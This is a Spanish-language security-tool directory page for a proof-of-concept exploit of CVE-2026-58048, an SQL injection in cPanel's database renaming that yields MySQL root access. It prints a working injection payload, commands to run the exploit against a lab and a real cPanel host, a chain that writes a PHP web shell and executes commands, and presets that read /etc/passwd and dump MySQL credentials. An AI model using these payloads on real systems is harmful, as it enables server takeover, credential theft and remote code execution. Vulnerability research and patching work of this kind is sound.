Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/imbas007/poc-cve-2026-58048
Escalada de PrivilegiosExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de PenetraciónSeguridad de Bases de DatosLabs y Práctica
GitHubimbas007/poc-cve-2026-58048

POC-CVE-2026-58048

Proyecto de investigación de seguridad

Ver Repositorio
16hace 1 mesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-58048

CVSS 4.0: 9.4 (Crítico) | CWE-89: Inyección SQL | NVD

Un usuario autenticado de cPanel → SQL arbitrario como root de MySQL mediante el renombrado de bases de datos. cPanel conserva incorrectamente el sql_mode de la sesión del usuario (ANSI_QUOTES) al ejecutar operaciones de renombrado como root — una comilla invertida en el nombre de la base de datos rompe el identificador e inyecta SQL.

root@kitploit:~
name: db`; GRANT ALL ON *.* TO 'rce'@'%' IDENTIFIED BY 'pwned!'; -- 

Inicio rápido (Laboratorio Docker)

root@kitploit:~
pip install -r requirements.txt

python3 simulate.py start   # start lab (MariaDB:13306, cPanel API:18080, Apache:18081)
python3 poc.py -t http://localhost:18080 --mysql-port 13306 --payload admin-user --verify
python3 simulate.py stop

El modo de laboratorio se detecta automáticamente — no se necesita la opción --lab.

Objetivo cPanel real

root@kitploit:~
python3 poc.py -t https://cpanel.example.com:2083 -u user -p 'pass' \
    --payload admin-user --verify

Presets de payload

SQL personalizado: --inject "GRANT ALL ON *.* TO 'x'@'%' IDENTIFIED BY 'y'"

Cadena RCE completa (Laboratorio)

root@kitploit:~
# 1. Escribir shell en la raíz web
python3 poc.py -t http://localhost:18080 --mysql-port 13306 \
    --payload webshell --shell /var/www/html/shell.php

# 2. ¡Ejecutar comandos vía HTTP!
curl "http://localhost:18081/shell.php?0=id"

Versiones afectadas

cPanel < 11.110.0.137, 11.118.0.71, 11.126.0.78, 11.134.0.48, 11.136.0.32; WP Squared < 11.138.1.6

Mitigación: actualizar, o revocar la funcionalidad de MySQL a los usuarios de cPanel.

Referencias

  • Aviso de cPanel
  • SecurityOnline

Solo para pruebas de seguridad autorizadas y fines educativos.

Descargar herramienta
PresetEfecto
admin-user (predeterminado)Crear el usuario administrador de MySQL rce
compact-adminPayload de administrador corto (<64 caracteres — cabe en el límite de nombre de cPanel real; verificar: r/p)
webshellEscribir shell PHP mediante INTO OUTFILE (--shell /var/www/html/shell.php)
read-fileLeer archivo del servidor mediante LOAD_FILE (--file /etc/passwd)
dump-usersVolcar todas las credenciales de MySQL a pwn.users
udf-rceEjecución de comandos del sistema operativo mediante UDF